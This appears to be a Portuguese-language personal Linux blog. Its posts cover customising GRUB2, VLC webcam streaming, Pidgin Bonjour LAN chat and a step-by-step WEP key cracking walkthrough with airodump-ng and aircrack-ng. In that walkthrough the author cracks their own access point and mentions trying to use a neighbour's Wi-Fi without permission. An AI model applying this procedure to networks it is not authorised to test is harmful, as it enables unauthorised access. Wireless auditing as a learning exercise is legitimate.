como editar o novo grub(grub2) que é gerado automaticamente:
----------------------------
Lá pelos idos de 2007(que eu lembro) ainda o grub tinha um arquivo(script) menu.lst semi-pronto,
modificado pelo usuario na instalaçao do S.O. por perguntas padronizadas que se ia respondendo.
----------------------------
Atualmente vizando a facilitacao do uso o arqivo de saida do Grub e gerado automaticamente
por um script que gera o grub.cfg usando bases do daemon grub.d no diretorio /etc
veja aqui a listagem:
----------------------------
$ ls -n /etc/grub.d
-rwxr-xr-x 1 root root 6433 Jan 17 2011 00_header
-rwxr-xr-x 1 root root 5343 Jan 17 2011 05_debian_theme
-rwxr-xr-x 1 root root 4284 Jan 17 2011 10_linux
-rwxr-xr-x 1 root root 4925 Jan 17 2011 20_linux_xen
-rwxr-xr-x 1 root root 595 Mar 14 2010 20_memtest86
-rwxr-xr-x 1 root root 1570 Out 19 2010 20_memtest86+
-rwxr-xr-x 1 root root 5789 Jan 17 2011 30_os-prober
-rwxr-xr-x 1 root root 2639 Mar 4 2011 30_otheros
-rwxr-xr-x 1 root root 977 Jul 20 08:33 40_custom
-rwxr-xr-x 1 root root 95 Jan 17 2011 41_custom
-rw-r--r-- 1 root root 483 Jan 17 2011 README
----------------------------
comecamos fazendo um backup de seguranca:
$ su
(senha)
# cp /etc/grub.d 40_custom 40_custom-bkp
---------------------------
retire as permicoes de execucao dos arquivos abaixo desabilitando o bit que opera isto.
# chmod -x 10_linux 20_memtest86 20_memtest86+ 30_os-prober 30_otheros 40_custom-bkp
---------------------------
veja a lista abaixo
# ls -l /etc/grub.d
-rwxr-xr-x 1 root root 6433 Jan 17 2011 00_header
-rwxr-xr-x 1 root root 5343 Jan 17 2011 05_debian_theme
-rw-r--r-- 1 root root 4284 Jan 17 2011 10_linux
-rwxr-xr-x 1 root root 4925 Jan 17 2011 20_linux_xen
-rw-r--r-- 1 root root 595 Mar 14 2010 20_memtest86
-rw-r--r-- 1 root root 1570 Out 19 2010 20_memtest86+
-rw-r--r-- 1 root root 5789 Jan 17 2011 30_os-prober
-rw-r--r-- 1 root root 2639 Mar 4 2011 30_otheros
-rwxr-xr-x 1 root root 977 Jul 20 08:33 40_custom
-rw-r--r-- 1 root root 214 Jul 20 08:32 40_custom-bkp
-rwxr-xr-x 1 root root 95 Jan 17 2011 41_custom
-rw-r--r-- 1 root root 483 Jan 17 2011 README
---------------------------
ficando apenas 5 arquivos ativos a executar, mas nao terminamos ainda...
abra no seu editor de texto preferido (gedit, kedit, nano, kword, kwrite, vi, vim, emacs ...)
o arquivo /boot/grub/grub.cfg e abra tambem (como root) o /etc/grub.d/40_custom
copie (use o Crtl+c e Crtl+v se quiser) e cole apenas as entradas de S.O. comecadas por
menuentry "sistema encntrado" opcoes { e terminadas com apenas um
} na linha ( } = colchete)
mas ATENCAO NAO MEXA NAS DUAS PRIMEIRAS LINHAS, as 3,4,5 sao explicacoes, apos essas eu adicionei
sendo que iniciam na ordem que estiver aqui o Pandorga primeiro que o Xharmy
ex:
bgr@xharmy:~$ cat /etc/grub.d/40_custom
#!/bin/sh
exec tail -n +3 $0
# This file provides an easy way to add custom menu entries. Simply type the
# menu entries you want to add after this comment. Be careful not to change
# the 'exec tail' line above.
menuentry "Pandorga GNU/Linux Educacional" {
insmod part_msdos
insmod ext2
set root='(hd0,msdos2)'
search --no-floppy --fs-uuid --set c3c7c538-d831-4e79-87b6-b5772b5ba492
linux /boot/vmlinuz-2.6.32-5-686 root=UUID=c3c7c538-d831-4e79-87b6-b5772b5ba492 ro quiet
initrd /boot/initrd.img-2.6.32-5-686
}
menuentry "Xharmy GNU/Linux = experimental" --class debian --class gnu-linux --class gnu --class os {
insmod part_msdos
insmod ext2
set root='(hd0,msdos3)'
search --no-floppy --fs-uuid --set a358e15f-b4fd-4c0a-b1d1-c47229dc93bd
echo 'Loading Linux 2.6.32-5-686-bigmem ...'
linux /boot/vmlinuz-2.6.32-5-686-bigmem root=UUID=a358e15f-b4fd-4c0a-b1d1-c47229dc93bd ro quiet
echo 'Loading initial ramdisk ...'
initrd /boot/initrd.img-2.6.32-5-686-bigmem
-----------------------------------------------
observando a listagem (ls) do /etc/grub.d tem numerados 0,5,10,20,30,40 pois sao executados na sequencia.
como deixamos ativados o 0,5,20_xen,40 e 41
nao vai rodar o memtest, nem 30_os-prober (acha S.O linux) nem 30_otheros (acha S.O. windows)
porem estes "acha" podem se perder de tiver uma particao apenas formatada ele assume que tem um sistema
embaralhando a saida do final.
----------------------------------------
terminando esta etapa de configuracao vamos fazer o grub gerar o grub.cfg que queremos.
# update-grub
espere uns 4 segundos e aárece a mensagem:
Found background image: /usr/share/images/desktop-base/desktop-grub.png
agora reinicie o sistema
# shutdown -r now
-----------------------------------------
referencias:
http://www.vivaolinux.com.br/dica/Personalizando-o-Grub-2
http://linuxnanet.com/2009/11/removendo-o-memtest-e-o-recovery-mode-do-grub-2.html
sábado, 20 de julho de 2013
terça-feira, 9 de julho de 2013
sábado, 1 de junho de 2013
VLC em ação tutorial = recita de bolo
o VLC dispensa apresentações mas pra quem quiser segue o link oficial em protuguês.
---------------------------------------
mas vim aqui mostrar o meu uso e espero ajudar outros usuários.
o que eu consegui fazer, passei a imagem capturada pela webcam de um LapTop para outro, em rede sem fio. o que o VLC fez, transformou as imagens da cam em pacotes TCP/IP, transferiu pela rede e recodificou no outro micro. com esta funcionalidade básica o VLC pode fazer o mesmo com: arquivo de filmes/videos, venha ele do local de armazenamento que tiver(HD, CD, DVD, cartão de memória, pendrive, HD USB externo, pasta em rede local -LAN ou Ethernet). e como mostra e transfere da webcam, faz o mesmo na placa de captura, mostra e transfere/transmite o que a placa de TV capturar, vc compartilha a TV do seu micro com todos os micros da sua rede LAN !!! [um sonho maravilhoso].
---------------------------------------
vamos à receita: ingredientes:
dois LapTops com VLC, rede wireless pingando e ok
---------------------------------------
---------------------------------------
minha wireless:
---------------------------------------
meu LapTop:
---------------------------------------
o LapTop emprestado: Positivo Unique S2085 nº serie 1A7629X9H com placa de captura Aver Media A857
(que tive que baixar o driver para funfar a TV)
---------------------------------------
a merda do Positivo com windows 8 64bits
---------------------------------------
em suma bote mais 200 reais e compre um micro melhor(HP, DELL, ACER, IBM-Lenovo)
por R$ 60,00 vc compra a placa de TV USB 2.0 neste link
---------------------------------------
mas vim aqui mostrar o meu uso e espero ajudar outros usuários.
o que eu consegui fazer, passei a imagem capturada pela webcam de um LapTop para outro, em rede sem fio. o que o VLC fez, transformou as imagens da cam em pacotes TCP/IP, transferiu pela rede e recodificou no outro micro. com esta funcionalidade básica o VLC pode fazer o mesmo com: arquivo de filmes/videos, venha ele do local de armazenamento que tiver(HD, CD, DVD, cartão de memória, pendrive, HD USB externo, pasta em rede local -LAN ou Ethernet). e como mostra e transfere da webcam, faz o mesmo na placa de captura, mostra e transfere/transmite o que a placa de TV capturar, vc compartilha a TV do seu micro com todos os micros da sua rede LAN !!! [um sonho maravilhoso].
---------------------------------------
vamos à receita: ingredientes:
dois LapTops com VLC, rede wireless pingando e ok
---------------------------------------
---------------------------------------
minha wireless:
---------------------------------------
meu LapTop:
---------------------------------------
o LapTop emprestado: Positivo Unique S2085 nº serie 1A7629X9H com placa de captura Aver Media A857
(que tive que baixar o driver para funfar a TV)
---------------------------------------
a merda do Positivo com windows 8 64bits
---------------------------------------
em suma bote mais 200 reais e compre um micro melhor(HP, DELL, ACER, IBM-Lenovo)
por R$ 60,00 vc compra a placa de TV USB 2.0 neste link
domingo, 26 de maio de 2013
bate papo entre os PCs de sua rede
Hoje em dia é muito comum o compartilhamento de internet.
basta um switch
ou AP 
e os micros estão em rede, mesmo sem o dono da conexão saber fazer uma rede; Mas a rede está formada
e se os PCs desta rede pudessem comunicar-se(e até trocar arquivos) mesmo sem internet.
Pois bem estou falando do PIDGIN do Linux. com ele instalado basta criar uma conta com o protocolo bonjour em todos os PCs que o PIDGIN faz a conexão automaticamente.
no Big Linux 12 - base: Unbutu 12.04 - já vem instalado basta configurar o protocolo "bonjour"
Dizem que no Windows XP funciona tem de Instalar o Pidgin e o Bonjour tambem.
pidgin-windows
bonjour
faça uma conta com o protocolo bonjour e teste pois só usei no Linux.
Eu testei em duas maquinas virtuais (dentro de um windows 7 com Virtual Box) com placas de rede configuradas para "rede interna" e [ifconfig eth0 10.1.1.5 up] e [eth0 10.1.1.9 up] ping e pong e foi só adicionar amigo para funfar ok.
e os micros estão em rede, mesmo sem o dono da conexão saber fazer uma rede; Mas a rede está formada
e se os PCs desta rede pudessem comunicar-se(e até trocar arquivos) mesmo sem internet.
Pois bem estou falando do PIDGIN do Linux. com ele instalado basta criar uma conta com o protocolo bonjour em todos os PCs que o PIDGIN faz a conexão automaticamente.
no Big Linux 12 - base: Unbutu 12.04 - já vem instalado basta configurar o protocolo "bonjour"
Dizem que no Windows XP funciona tem de Instalar o Pidgin e o Bonjour tambem.
pidgin-windows
bonjour
faça uma conta com o protocolo bonjour e teste pois só usei no Linux.
Eu testei em duas maquinas virtuais (dentro de um windows 7 com Virtual Box) com placas de rede configuradas para "rede interna" e [ifconfig eth0 10.1.1.5 up] e [eth0 10.1.1.9 up] ping e pong e foi só adicionar amigo para funfar ok.
quinta-feira, 28 de março de 2013
chave wep X back-track4
Na minha tentativa mais promissora de descobrir a senha de um AP meu,passei 30 min capturando pacotes IVs e não deu certo, tive de adicionar a senha em um arquivo "wordlist" para tentar de novo com os mesmos pacotes IVs e assim usando um "brute force" descobri a senha -master- então pra mim foi uma pseudo quebra de senha poi eu já a tinha na lista de possiveis, dada minha frustação deixei isto de lado; mas não perdi meu interesse em "pentest" pois vi uma reportagem televisiva onde o exercito brasileiro usa a distribuição Linux BackTrack para fazer auditoria em redes wifi.
Além de BT4 e BT5 beixei 3 versões do Beini, dada minha inabilidade em 'pentest', mesmo assim o maximo que consegui foi conectar-me em um AP da minha vizinha, porem o Beini dava conectado, sem senha ou navegação, nem acesso ao AP ou PC, é como ter passado pelo portao e não entrar na casa; e o objetivo eva navegar na internet usando a conexão alheia. Tá certo que era chave wpa2 mais em varias tentativas a APs diversos nem a conexão forçada eu consegui.
--------------------------------
porem não escrevo este post para lamentações e sim para contar de um sucesso, não a nada em pt-br na internet que ajude um iniciante a 'se dar bem' em 'pentestes' penso que há um complô ou pacto para vc ter de pagar por aulas em cursos, comprar DVDs de video aulas se quiser engatinhar nesta area.
Porem notadamente tem alguns tutoriais em espanhol que ajudam, as video aulas no youtube tem cortes e não são passo a paso, como precisa um iniciante, elas não são claras e deixam brechas onde o novato emperra, assim como nas dicas escritas, porém, como dizia peguei um tuto na web em espanhol e dele consegui descobrir a senha que coloquei no meu AP, foi uma senha exdruxulamente fraca: abcde porem nescessaria para meu aprendizado, já que sou autodidata.
vou detalhar aqui, meu 'sucesso' e fazer mais testes postando mais detalhes e sendo mais conciso na escrita, ou seja falando menos e fazendo mais.
============================
meu teste: hardware utilizado: software utilizado: metodo utilizado:
modem ZTE conectado à Velox e num switch GTS 8-portas
deste switch saem 3 cabos: 2 desktops com Big Linux 5 e com BackTrack 4 e o AP TPlink
a internet roda nos 2 micros, o AP Tplink(com nome de vitima) tem um Laptop HP conectado na wireless com wep de 5 letras(abcde)
nota: o windows 7 do Laptop nao aceita wep no modo compertilhado, tem que ser em modo aberto, comédia é que depois de configurado o AP (com wep-compartilhada) o windows7 não conecta para reconfigurar, teria de resetar o AP voltando à configuração de fabrica, se não fosse a conecxão cabeada com o PC-BT4 (não testei no PC-BL5)
corrigida a exigencia do win7, conectei o Laptop via wireless no AP e coloquei a navegar na web
desconectei o cabo-net do PC-BT4, voltei para modo texto(Crtl+Alt+Backspace) e pluguei nele uma placa de radio usb da Ralink,
estando na mesma sala nem precisei colocar antena
depois eu posto mais explicações com fotos
em modo texto e estando o prompt # na sua tela, coloque o wifi-usb no PC
aparece uma mensagem informando a detecção e ativação do dispositivo
o linux já sobe o modulo do wifi-usb veja em # lsmod
-------------------------
digite: airmon-ng que aparece a wlan0 com o nome Ralink
-------------------------
-agora digite airmon-ng
e veja interface= wlan0, chipset= Ralink 2573 USB e driver= rt2573usb - [phy1]
-agora digite airodump-ng wlan0
CH canal ][ elapsed: 3 mins ][ 2013-03-27 14:51 (observe que 'canal" não para de mudar indicando
que está escaneando todos os canais e a procurar qualquer AP)
-abaixo veja
BSSID PWR Beacons #Data, #/s CH MB ENc CIPHER AUTH ESSID
64:70:02:53:4E:2E -51 438 59 0 6 54e WEP WEP vitima
BSSID STATION PWR Rate Lost Packets Probes
64:70:02:53:4E:2E 00:26:C7:1F:20:2A -57 0 -1e 0 70 vitima
------------------------------------
agora digita Crtl-C para parar o scaneamento.
e digite denovo airodump-ng com algumas mudanças.
airodump-ng -c(canal da vitima)-w crackwep(nomearq com as captuas)
--bssid (MAC da vitima) wlan0(tua interface) assim só aparecerá o AP vitima
airodump-ng -c 6 -w crack-ap --bssid 64:70:02:53:4E:2E
veja que o contador de tempo zera e começas em segundos, e o campo CH não varia mais.
observe com atençao o campo #DATA... este valor tera de chegar a 15.000 ou mais para comecar a descriptografar a chave wep
------------------------
0 meu ja está com #data = 82.284 e packets = 85547
tecle Alt+F2 para ir a um outro terminal(continua como root #)
digite "ls" para ver os arquivos guardados na pasta root, seguindo meu exemplo temos
# ls
crack-ap-01.cap crack-ap-01.cvs crack-ap-01.kismet.cvs crack-ap-01.kismet.netxml install.sh
mas iremos usar o crack-ap-01.cap
# aircrack-ng crack-ap-01.cap
Opening crack-ap-01.cap
Read 152130 packets.
# BSSID ESSID Encryption
1 64:70:02:53:4E:2e vitima WEP (75972 IVs)
Choosing first network as target.
Opening crack-ap-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 76035 ivs.
KEY FOUND! [ 61:62:63:64:65 ] (ASCII: abcde)
Decrypted correctly: 100%
Subscrever:
Mensagens (Atom)